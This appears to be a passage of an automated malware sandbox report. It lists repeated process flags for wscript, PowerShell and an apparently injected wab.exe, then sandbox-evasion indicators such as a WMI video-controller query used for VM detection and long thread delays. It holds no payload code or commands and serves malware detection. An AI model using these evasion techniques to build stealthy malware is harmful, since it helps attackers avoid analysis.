              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24F64140 push ds; ret 11_2_24F6424E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24F62A61 push ds; ret 11_2_24F62A6E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24F64250 push ds; ret 11_2_24F64536
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 22550000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 226D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 225B0000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5457Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4452Jump to behavior
